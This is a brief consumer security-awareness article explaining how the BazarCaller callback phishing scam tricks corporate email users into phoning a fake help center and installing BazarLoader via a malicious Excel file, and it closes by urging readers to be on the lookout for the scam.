BazarLoader is vicious malware that, once uploaded, can run other programs on an infected computer covertly, disguising them as normal apps like Notepad. BazarLoader can even clean up after itself, removing itself from the disk and making a swift exit. Now, crooks are targeting corporate and institutional emails to trick targets into calling their “help” center to get step-by-step instructions to infect their own computers.
Here’s how it works:
First, the target will receive a phishing email stating their free trial of something is about to end. The email will include an offer of a trial, subscription, or financial service, appear to be from a legitimate source, and contain an associated website, phone number, and unique customer ID. The target will be prompted to call the phone number for customer service. This offers the scammer unique advantages. First, they will only be getting callers who fall for the first part of the trick, meaning they are more likely to follow along with the rest of the scam. Second, the target is lured into a false sense of security having been the one who initiated the phone call. The interaction feels like it’s on the terms of the target, not the scammer. Third, the target will be interacting with a live person who can respond in real time to the target.
On the phone call, the crook will prompt the target to enter their unique customer ID in the associated website, which adds another layer of apparent legitimacy to the process. Then, the page will prompt the victim to download an Excel document and click Enable Content, downloading and executing BazarLoader on the victim’s device.
Since corporate and institutional emails are the primary targets of these attacks, security researchers theorize that the purpose is to rent access to infected devices and their networks to ransomware syndicates. If you have a corporate or institutional email, be on the lookout for the BazarCaller scam. Even if the crook gets so far as to get you on the phone, hang up at the first wave of a red flag.